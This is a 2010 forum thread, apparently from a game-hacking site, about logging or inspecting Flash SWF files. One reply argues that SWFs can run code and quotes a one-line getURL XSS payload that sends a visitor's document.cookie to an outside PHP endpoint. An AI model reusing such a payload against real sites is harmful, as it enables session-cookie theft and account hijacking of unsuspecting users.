Is it possible?, if anyone here knows can you explain how it works and show me a tutorial or something
Results 1 to 19 of 19
Thread: Swf logging
- 08 May. 2010 01:18am #1
Swf logging
- 08 May. 2010 01:36am #2
- 08 May. 2010 01:42am #3
- 08 May. 2010 02:30am #4
- 27 May. 2010 05:38am #5
....
You are sadly mistaken.
SWFs are written in a programming language called ActionScript.
They can do a lot of shit.
For example, using getURL, a silent XSS attack was applied in the past.
Code:getURL('javascript:document.location="http://mysite.sub.com/cookies.php?sid="+document.cookie;');
The reason it was silent is this: the JavaScript had no access to the actual page so redirected what it could. That is to say, the swf was redirected but not the page (I think).
Anyway, you're pretty much completely wrong.
Side Note: The reason it couldn't generate it's own nonce is that Gaia uses GSI, their personal API.
They have a file that generates nonce already. Why the hell should they port a PHP function to ActionScript if they already generate it with PHP in their API?
Also, to do suld involve exposing system resources to the Flash file. This would potentially be BAD.
Basically, what I'm trying to say is this: They would have to be complete dumbasses to generate a nonce on the client side since nonce is for security and that would totally defeat the purpose.
For more information on ActionScript, check out the following:
ActionScript - Wikipedia, the free encyclopedia
Macromedia Flash - ActionScript Dictionary : Contents of the dictionary
ActionScript.org Flash, Flex and ActionScript Community - Tutorials, Support, Open Source & More
Also, because I just can't stop myself: How do you think Gaia's shit does anything they intend for it to do if the SWFs can't perform any kind of function?
Also, how do you think the flash shit GETS the data from the PHP file?
Also, HTML is not a programming language. You aren't gonna program anything for flash in HTML.
You can pass variables, but if you didn't know SWFs could perform functions, that's irrelevant anyway.
And you call yourself a programmer?
@OP, I'm not really sure what you mean. If you explain a bit more, I'll do everything I can to help you out.
If you mean getting info on swfs, then try this: https://addons.mozilla.org/en-US/firefox/addon/14465/
If you mean logging any swfs called, I'll rig up some greasemonkey script to save swfs from w/e sites you want to a web server.
Etc. What do you need?Last edited by Personoid; 28 May. 2010 at 04:17am.
- 28 May. 2010 03:55am #6
Personoid, You Lost Me At ...
My Guides:
Use Items Twice
[WPE]Emote Scripting
Mod Your Gamertag On MW2 With A USB
Mod Your Gamerscore With A USB
Mod MW2 Spec Ops With A USB
Mod Your Avatar With A USB
How to get free DLC
50 Posts
100 Posts
150 Posts
250 Posts
500 Posts
1000 Posts
Incomplete Complete
R.I.P
My Gaia accounts.
TlMlD
I3R
I Hi-Fi I
I iMusic I
I3 I S H
- 28 May. 2010 04:18am #7
- 28 May. 2010 04:34am #8
I Think Im Beginning To Understand.
My Guides:
Use Items Twice
[WPE]Emote Scripting
Mod Your Gamertag On MW2 With A USB
Mod Your Gamerscore With A USB
Mod MW2 Spec Ops With A USB
Mod Your Avatar With A USB
How to get free DLC
50 Posts
100 Posts
150 Posts
250 Posts
500 Posts
1000 Posts
Incomplete Complete
R.I.P
My Gaia accounts.
TlMlD
I3R
I Hi-Fi I
I iMusic I
I3 I S H
- 30 May. 2010 08:05am #9
I feel you bro i am kinda lost to but ill still take a look.
Edit:
Ok so ive found a method so for example think of a for like this:
Code:<HTML> <HEAD> <meta http-equiv=Content-Type content="text/html; charset=ISO-8859-1"> <TITLE>Saving text to text file</TITLE> <script src="activeFlash.js" type="text/javascript"></script> </HEAD> <BODY bgcolor="#FFFFFF" scroll="no"> <Table cellpadding="0" cellspacing="0" width="100%" height="100%" ><tr><td align="center" valign="middle"> <script language="javascript">activeObject();</script> </td></tr></table> </BODY> </HTML>
Last edited by PedoBear™; 30 May. 2010 at 08:17am.
- 30 May. 2010 01:11pm #10
- 30 May. 2010 04:14pm #11
You made your account creator in Flash? What a weird thing to do.
- 30 May. 2010 04:40pm #12
- 30 May. 2010 05:16pm #13
Hey man, can you explain exactly what you're trying to do. I'm thinking you're trying to use fscommand?
Tell me what you're trying to do.
- 30 May. 2010 05:21pm #14
- 30 May. 2010 05:41pm #15
Are you sure? If so that's probably one of the easiest things.
- 30 May. 2010 06:55pm #16
Lol, if your making a SWF Flp, ive made one, its easy
Yes It can be done. I cant remember how, because this was a while ago back on LG 1.0
I've reformatted since than, and bought a new computer. If I ever find the source again I will show you.Shh, I'm watching My little pony.
- 30 May. 2010 11:46pm #17
Except we don't know for sure if that's the case. There's other things he could mean. Which is why I'm kind of waiting for him to elaborate.
- 31 May. 2010 03:13am #18
- 31 May. 2010 02:21pm #19